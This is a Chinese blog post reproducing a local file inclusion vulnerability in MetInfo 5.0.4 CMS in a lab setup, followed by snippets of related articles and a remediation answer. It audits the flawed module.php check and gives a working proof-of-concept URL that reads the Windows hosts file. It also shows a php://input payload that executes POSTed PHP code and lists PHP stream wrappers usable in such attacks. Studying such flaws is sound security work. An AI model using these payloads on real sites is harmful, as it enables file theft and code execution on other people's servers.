[漏洞复现]metinfo5.0.4文件包含

已于 2023-08-31 21:28:50 修改
阅读量218 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 网络安全
于 2023-08-31 19:32:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/feigerger/article/details/132603065
该博客围绕metinfo5.0.4在windows server 2016环境下的漏洞展开。介绍了漏洞点,通过代码审计发现文件包含函数相关问题,将fmodule设为7可复现。还提及其他利用方式,如利用封装协议执行PHP命令,修改请求方式和参数可看到phpinfo界面。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境

OS:windows server 2016

cms:metinfo5.0.4

web server:phpstudy pro

PHP版本:php5.3.29

漏洞点:

http://127.0.0.1/MetInfo5.0/about/index.php

image-20230831165916321

POC

?fmodule=7&module=c:/windows/system32/drivers/etc/hosts

image-20230831170151957

代码审计

打开./about/index.php

<?php
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. 
$filpy = basename(dirname(__FILE__));
$fmodule=1;
require_once '../include/module.php';
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

发现使用了文件包含函数require_once,包含了文件module.php

我们打开./include/module.php

if($fmodule!=7){
    if($mdle==100)$mdle=3;
    if($mdle==101)$mdle=5;
    $module = $modulefname[$mdle][$mdtp];
    if($module==NULL){okinfo('../404.html');exit();}
    if($mdle==2||$mdle==3||$mdle==4||$mdle==5||$mdle==6){
        if($fmodule==$mdle){
            $module = $modulefname[$mdle][$mdtp];
        }
        else{
            okinfo('../404.html');exit();
        }
    }
    else{
        if($list){
            okinfo('../404.html');exit();
        }
        else{
            $module = $modulefname[$mdle][$mdtp];
        }
    }
    if($mdle==8){
    if(!$id)$id=$class1;
    $module = '../feedback/index.php';
    }
}

发现当fmodule!=7时,才会对module进行验证,所以我们将fmodule=7,即可复现

其他利用方式

利用封装协议php://input 执行PHP 命令;

右击,更改请求方式,修改请求方式为POST

image-20230831192112707

再将请求参数添加到url中

image-20230831192210777

更改url为 /MetInfo5.0/about/index.php?fmodule=7&module=php://input

image-20230831192311502

post请求参数为php代码

<?php
phpinfo();
?>

发送请求后即可看到phpinfo界面

image-20230831192518772

此外,还可以利用其他php封装协议

file://         #访问本地文件系统
http://         #访问HTTP(s)网址
ftp://          #访问FTP(s)URLs
php://          #访问各个输入/输出流(I/0 streams)
zlib://         #压缩流
data://         #数据(RFC2397)
glob://         #查找匹配的文件路径模式
phar://         #PHP归档
ssh2://         #Secure Shell 2
rar://          #RAR
ogg://          #音频流
expect://       #处理交互式的流

Fredg0n
关注
metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 750
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
【文件上传漏洞-08】常见编辑器上传以及常见的CMS 上传漏洞
m0_64378913的博客
07-12 2471
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞,从而进行getshell(1)ewebeditor(比较古老的编辑器)(2)fckeditor利用小马拉大马也是一个惯用伎俩!CMS 又叫网站内容管理系统(网站的模版,帮助我们快速建站,我们会在这个网站模板上做二次开发),市面上很多开源的CMS 的历史版本有很多都存在着文件上传漏洞,但是产生文件上传漏洞的原因不尽相同,情景也不似本章上文中介绍的那样“直白”。类似的CMS 有很多,比如常见的dedeCMS(
metinfov5.0.4漏洞复现
Key_book(句芒安全实验室)
06-07 3940
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用. 产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 . 下面开始漏洞复现 测试环境: ...
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 475
metinfo_5.0.4_filein-Include漏洞复现
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 702
metinfo 、文件上传、漏洞、一句话木马
metinfo靶场获取
06-27
引用中提到了MetInfo5.0.4版本存在文件上传漏洞,并且有相关的漏洞利用教程。此外,引用还提到了其他漏洞(如XXE、CSRF)的测试,但我们的重点是MetInfo靶场。由于用户需要搭建MetInfo漏洞靶场,我们可以提供以下...
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2087
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
metinfo_5.0.4_file-upload
weixin_43886198的博客
12-21 1399
metinfo_5.0.4_file-upload 漏洞描述 MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞漏洞危害等级 高危 影响版本 5.0.4 漏洞复现 基础环境 组件 版本 OS Windows 2008 R2 x64 Web Server phpStudy 2016(特别版) Source Code MetInfoV5.0.4 漏洞演示 本地构造HTML 表单,进行文件上传 变量覆盖,SQL注入(# %23),双写绕过。
[漏洞复现] MetInfo5.0.4文件包含漏洞
Da1NtY的博客
06-28 578
漏洞出现在中,因为利用了动态地址,所以存在漏洞漏洞检查语句(!
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1930
进行漏洞复现,读取敏感文件
MetInfo最新网站漏洞如何修复以及网站安全防护
网站安全专家
10-22 2029
metinfo漏洞于2018年10月20号被爆出存在sql注入漏洞,可以直接拿到网站管理员的权限,网站漏洞影响范围较广,包括目前最新的metinfo版本都会受到该漏洞的攻击,该metinfo漏洞产生的主要原因是可以绕过metinfo的安全过滤函数,导致可以直接插入恶意的sql注入语句执行到网站的后端里去,在数据库里执行管理员操作的一些功能,甚至可以直接sql注入到首页文件index.php去获取到...
MetInfo 任意文件读取漏洞的修复与绕过
Peter 的博客
02-11 2273
漏洞简介 MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。 漏洞影响 MetInfo 6.0.0 MetInfo 6.1.0 漏洞分析 看到\MetInfo6\app\system\include\module\old_thumb...
Metinfo5.3.10文件包含分析
dengzhasong7076的博客
11-05 492
Metinfo5.3.10文件包含 漏洞成因 /admin/login/login_check.php <?php error_reporting(E_ERROR | E_WARNING | E_PARSE); if ($depth != '' && $depth != '../' && $depth != '../../') {die();} if...
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6376
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 3911
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &amp;action=editor &amp;foldername=upload &...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8740
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2022年网站美工个人年度工作总结(1).doc
最新发布
07-28
2022年网站美工个人年度工作总结(1).doc
财务软件销售实习报告格式范文-实习报告格式(1).doc
07-28
财务软件销售实习报告格式范文-实习报告格式(1).doc
metinfo5.0.4文件包含
03-28
### 关于 Metinfo 5.0.4 版本中的文件包含漏洞及其修复方案 Metinfo 是一款流行的开源 CMS 系统,广泛用于构建企业网站和其他在线平台。然而,在其早期版本中存在一些已知的安全漏洞,其中包括文件包含漏洞。 #### 文件包含漏洞概述 文件包含漏洞是一种常见的 Web 应用程序安全缺陷,允许攻击者通过构造特定的输入参数来访问或加载未经授权的本地或远程文件。对于 Metinfo 5.0.4 的情况,该版本可能存在未对用户提交的数据进行充分过滤的情况,从而使得攻击者能够利用此漏洞实现任意文件读取甚至远程代码执行[^1]。 #### 解决方案分析 为了有效应对这一威胁并保护基于 Metinfo 构建的应用免受侵害,建议采取以下措施: 1. **升级到最新稳定版** 开发团队通常会在后续更新中修补发现的安全隐患。因此,最直接有效的办法就是将系统迁移到官方发布的较新版本(如可能的话)。这些新版不仅修正了旧有 bug 还增强了整体安全性[^2]。 2. **实施严格的白名单机制** 对所有涉及动态文件名处理的功能模块应用严格的校验逻辑。仅接受预定义范围内的合法选项作为实际操作对象而非依赖黑名单方式阻止非法请求[^3]。 3. **禁用危险函数调用** PHP 中某些内置功能如果被滥用也可能成为安全隐患源头之一。例如 `include()`, `require()` 及它们各自的变体形式都应谨慎使用,并考虑移除不必要的外部链接支持以防万一发生 SSRF 类型攻击事件[^4]。 4. **增强日志记录与监控能力** 建立健全的日志体系有助于及时察觉异常行为模式进而快速响应潜在入侵企图;同时配合实时告警工具进一步提升防护水平[^5]。 以下是针对上述提到的部分技术要点的一个简单示例代码片段展示如何改进原有设计思路以减少风险暴露面: ```php <?php // 安全加固后的文件引入示范 $allowed_files = ['config.php', 'functions.inc']; // 白名单列表 if (isset($_GET['file']) && in_array(basename($_GET['file']), $allowed_files)) { include $_GET['file']; } else { die('Invalid File Request'); } ?> ``` 以上脚本通过限定可加载资源集合的方式极大降低了因不当配置而导致意外后果的可能性。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值